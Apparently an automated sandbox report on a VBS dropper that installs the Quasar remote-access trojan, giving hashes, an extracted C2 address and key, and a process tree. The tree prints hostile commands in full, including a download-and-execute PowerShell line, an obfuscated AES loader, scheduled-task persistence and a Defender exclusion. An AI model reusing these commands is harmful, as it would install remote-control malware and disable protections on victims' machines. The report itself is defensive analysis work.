Overview

overview

10

Static

static

1

9273_output.vbs

windows7-x64

8

9273_output.vbs

windows10-2004-x64

10

9273_output.vbs

windows10-ltsc 2021-x64

10

9273_output.vbs

windows11-21h2-x64

10

Analysis

  • max time kernel
    95s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    09-12-2024 17:28

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    9273_output.vbs

  • Size

    1.6MB

  • MD5

    89444730511dcc04894433ad215e9f02

  • SHA1

    8af2c8469f0381666bbdfbb12965c48290ef817b

  • SHA256

    7bfbcbf1a30ba537264e189e39b2ada434fc451c99a7fe680aa6196cd931b625

  • SHA512

    121bcab2c0e4c0c307565742f03d4ebef33ba677f4591a2d95238c500c82fbeafd4d52521bdf57e0775178b081a95b877b561721ec72540b0beb4acf3548a19f

  • SSDEEP

    24576:prCPrx+7wnggpUvK3oVj1S1LYuhN0E7olLXm5ttA7AhazaJUelDBY1Qq0+BbUklh:g/rUTV40u3oli5LEgaaUKat0+BbeYz

Score
10/10
quasarsearchindexerexecutionspywaretrojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

searchindexer

C2

87.120.113.125:55644

Mutex

0c021db0-bf71-4ae4-b9ae-2671afdea591

Attributes
  • encryption_key

    54717FCDBD30C7781F669403FBC8E35733C37E34

  • install_name

    searchindexer.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    searchindexer

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

    trojanspywarequasar
  • Quasar family
    quasar
  • Quasar payload 1 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

    execution
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Kills process with taskkill 1 IoCs
    evasion
  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 12 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\9273_output.vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2772
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2064
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2932
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4816
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp" "c:\Users\Admin\AppData\Local\Temp\wiobhgbz\CSCC1978987AE194A629643B7EBA38634B8.TMP"
            5⤵
              PID:3148
          • C:\windows\system32\cmstp.exe
            "C:\windows\system32\cmstp.exe" /au C:\windows\temp\rtmqsq0h.inf
            4⤵
              PID:1736
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:60
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Local\Temp\c.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:3900
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_122_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\latencyx122.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4060
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\latencyx122.vbs"
              4⤵
              • Checks computer location settings
              • Suspicious use of WriteProcessMemory
              PID:3068
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\latencyx122.bat" "
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:4832
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function fn1($p1){ $a=[System.Security.Cryptography.Aes]::Create(); $a.Mode=[System.Security.Cryptography.CipherMode]::CBC; $a.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $a.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('r+bFNsKWcrMhhN0VNqHyPpVzm490/5Y+urqm0SsiN9g='); $a.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('QFHft5W2NiDlaGOW8LKzjw=='); $d=$a.CreateDecryptor(); $r=$d.TransformFinalBlock($p1, 0, $p1.Length); $d.Dispose(); $a.Dispose(); $r;}function fn2($p2){ $m1=New-Object System.IO.MemoryStream(,$p2); $m2=New-Object System.IO.MemoryStream; $g=New-Object System.IO.Compression.GZipStream($m1, [IO.Compression.CompressionMode]::Decompress); $g.CopyTo($m2); $g.Dispose(); $m1.Dispose(); $m2.Dispose(); $m2.ToArray();}function fn3($p3, $p4){ $a1=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$p3); $e=$a1.EntryPoint; $e.Invoke($null, $p4);}$p='C:\Users\Admin\AppData\Roaming\latencyx122.bat';$host.UI.RawUI.WindowTitle = $p;$c=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($p).Split([Environment]::NewLine);foreach ($l in $c) { if ($l.StartsWith(':: ')) { $pl=$l.Substring(3); break; }}$pdata=[string[]]$pl.Split('\');$p1=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[0])));$p2=fn2 (fn1 ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($pdata[1])));fn3 $p1 $null;fn3 $p2 (,[string[]] (''));
                  6⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in Program Files directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of WriteProcessMemory
                  PID:4364
                  • C:\Windows\SYSTEM32\schtasks.exe
                    "schtasks" /create /tn "searchindexer" /sc ONLOGON /tr "C:\Program Files\SubDir\searchindexer.exe" /rl HIGHEST /f
                    7⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:4580
                  • C:\Program Files\SubDir\searchindexer.exe
                    "C:\Program Files\SubDir\searchindexer.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    PID:3480
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
        1⤵
        • Command and Scripting Interpreter: PowerShell
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2024
      • C:\Windows\system32\taskkill.exe
        taskkill /IM cmstp.exe /F
        1⤵
        • Kills process with taskkill
        • Suspicious use of AdjustPrivilegeToken
        PID:3392

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Program Files\SubDir\searchindexer.exe
        Filesize

        442KB

        MD5

        04029e121a0cfa5991749937dd22a1d9

        SHA1

        f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

        SHA256

        9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

        SHA512

        6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
        Filesize

        2KB

        MD5

        d85ba6ff808d9e5444a4b369f5bc2730

        SHA1

        31aa9d96590fff6981b315e0b391b575e4c0804a

        SHA256

        84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

        SHA512

        8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        bf0eda50972f08c8b9d8c9cb5ce7d0c2

        SHA1

        2d8fb14d729b8afe30b4dd3d83d9dfa50afd5dab

        SHA256

        58507df56c947895b91930c001aa1e917c7bd33cf813ec203487735195c545e1

        SHA512

        4acafe573b1ef9063ef434e44f72ba3e69d8b39834c13a11fc3c240cacfae71e45634829e31c1669ce842e2f7de0b11a4076142bcd3f185d6db5c67bbd64c2fb

        Download Submit

      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
        Filesize

        1KB

        MD5

        c4aa2db9bf8394c9fd7a89374c873658

        SHA1

        bb0bb7955db4ffa413012b62f673ac942f27e852

        SHA256

        eb997eddab899d4f7547c0d3d9a807f7a1f5da92d10a818b256d793617c0cd92

        SHA512

        c61415d0d81cdbbf0172dc02f4dd24ee1cd0e654e42e1cecf60ddb9a38e919ac7a3a3aa03cad65c12d97847cdfb5b39099f80c4277906a861217e56d01681628

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\RESCA93.tmp
        Filesize

        1KB

        MD5

        a9e958a3e986a92fd9edcd8c1637ea9b

        SHA1

        077a92e39f2a3015cc48d0070582e0ee0ccc718d

        SHA256

        81b301fa37bf7b0104a7ae10abb01a630f38adc27fc27472a9891b6d9e870857

        SHA512

        561200907efd4ab4f010228859be4493f27d37a6186a4f8ab79845574cd17d5b61b43b385311496fbfdccb1d7607a953aee98c91bdc81923701c1a7bf0aaca34

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4lec4lr.az4.ps1
        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\c.bat
        Filesize

        1.6MB

        MD5

        63a0d558702bb4b4fdad3fbe2ffc0ac9

        SHA1

        c70f2444e8052e6495c42f179785da267acac50b

        SHA256

        c3c8a913470c637c51bc84cdaaf8eb23f52556ad289d57c79e9c9cfa7bf9f757

        SHA512

        7f7819c86ac7a74694dc77b21cb54ccbfc084d98554d880323ba460dc033492718f052041f001837c5412af52aa0c29a8a30125f8413276201643d516e052f10

        Download Submit

      • C:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.dll
        Filesize

        4KB

        MD5

        d2c22f029feb022eaae6cba32f74b844

        SHA1

        e968c151ef2a36264531b075873b8daf197df45b

        SHA256

        b02fe52358f2f0e5ed918eac44cb8597631a98345a8c43830dfb003366f77325

        SHA512

        48556e5551fbf92373e5e400ea9007f81415be64798f01bd6b86246a17d892ee0a9a808816b4a125b2d52c6863ad4c024fa5b6def6e91d956e98814c782b02f7

        Download Submit

      • C:\Users\Admin\AppData\Roaming\latencyx122.vbs
        Filesize

        111B

        MD5

        b5f84a2a90df4f61706bbc6cc2de6024

        SHA1

        bcfa4cf369c51e9d0092d8892b06fd890c83d758

        SHA256

        a574a59174d2b2445c3ab8ff1b2319911008623ecf165d6d80ddfb9b8d997986

        SHA512

        202f99975ba293dc19af0edcbacc821ed1b145daf7b4b59e99bd0a95da76b5958df1837d3e1dec381aec99500cb5d2881a819e83f12372fd2271ecd69a2d55ce

        Download Submit

      • C:\windows\temp\rtmqsq0h.inf
        Filesize

        683B

        MD5

        a4fd12b94ad4ac06fabd8dd56dd5ff2b

        SHA1

        940d129205e04ba31b10a72d7a7a236a9ed0488b

        SHA256

        fe9977d49d2ae366779da959a5c9a6cc7664bc82d7c8e243f1baa9aa539cd320

        SHA512

        a4712ad7a23ab7a1eadfdaa7dc73dc406a0a14313c0413561f2f4ba8087c79c504d1d4391585b1b91f580ffef3869a37523707979dd5ab870a596062497e79fe

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\CSCC1978987AE194A629643B7EBA38634B8.TMP
        Filesize

        652B

        MD5

        a801a5894d4eceda79d65d2f2e1320b5

        SHA1

        20f6a1c4fadd05559d9cb0485be97a0242232a0c

        SHA256

        cc3c1fd6330d257f5c054327ca0d1dda29bf7ce40814b6ef6bd58527df33dc92

        SHA512

        46e97d27530a89a73aec58125026ebf3dedfba085b93911f7ff7ceb08e531bc6d7d48d1e86c137e05b6d2f233b03f1d2cb2a9016242bb105c06bf65d94d236e6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.0.cs
        Filesize

        2KB

        MD5

        897ac4306f2a2524bc3c441bd00c72b9

        SHA1

        1703dbf9a2a78491dfd6685540d4691839e33b69

        SHA256

        a889dd1616631e369d253d6d89cc3a253b663e636bb1cdebbf831817592b405b

        SHA512

        2eba96a7960fe4c8c083ffbca30dbff4c5aac6acfa2c99b6ab5802376d028cbf471c3f06fcef9a3a0129dc988df1aceba808c3436cd110c123dc2ba1147c81b6

        Download Submit

      • \??\c:\Users\Admin\AppData\Local\Temp\wiobhgbz\wiobhgbz.cmdline
        Filesize

        369B

        MD5

        d1b1e1dfc36b17f2f9c33c9bd92581c3

        SHA1

        ebff24ca65cff19330ec496adfa9048c260e2985

        SHA256

        4ad70d5f3e8683b10a667f3c5a2d862678e7cf5a114ccbf740f78f2b3ad7caae

        SHA512

        8e94bfe606485333420fdaad7faa763be4985ebaa66504121b0907abf0434527a5764955cc9a1631ab553a04dcc12da1de692f309ae8061cab3a71287daae81a

        Download Submit

      • memory/2932-13-0x0000017F710E0000-0x0000017F710FC000-memory.dmp

        Filesize

        112KB

        Download

      • memory/2932-1-0x0000017F70C40000-0x0000017F70C62000-memory.dmp

        Filesize

        136KB

        Download

      • memory/2932-43-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2932-0-0x00007FF8221A3000-0x00007FF8221A5000-memory.dmp

        Filesize

        8KB

        Download

      • memory/2932-48-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2932-26-0x0000017F71150000-0x0000017F71158000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2932-44-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2932-12-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/2932-11-0x00007FF8221A0000-0x00007FF822C61000-memory.dmp

        Filesize

        10.8MB

        Download

      • memory/3480-109-0x000001D2BA510000-0x000001D2BA586000-memory.dmp

        Filesize

        472KB

        Download

      • memory/3480-108-0x000001D2BA100000-0x000001D2BA144000-memory.dmp

        Filesize

        272KB

        Download

      • memory/3900-64-0x000002E29BEB0000-0x000002E29BFE2000-memory.dmp

        Filesize

        1.2MB

        Download

      • memory/3900-63-0x000002E281900000-0x000002E281908000-memory.dmp

        Filesize

        32KB

        Download

      • memory/4364-93-0x00000131D6F80000-0x00000131D72A4000-memory.dmp

        Filesize

        3.1MB

        Download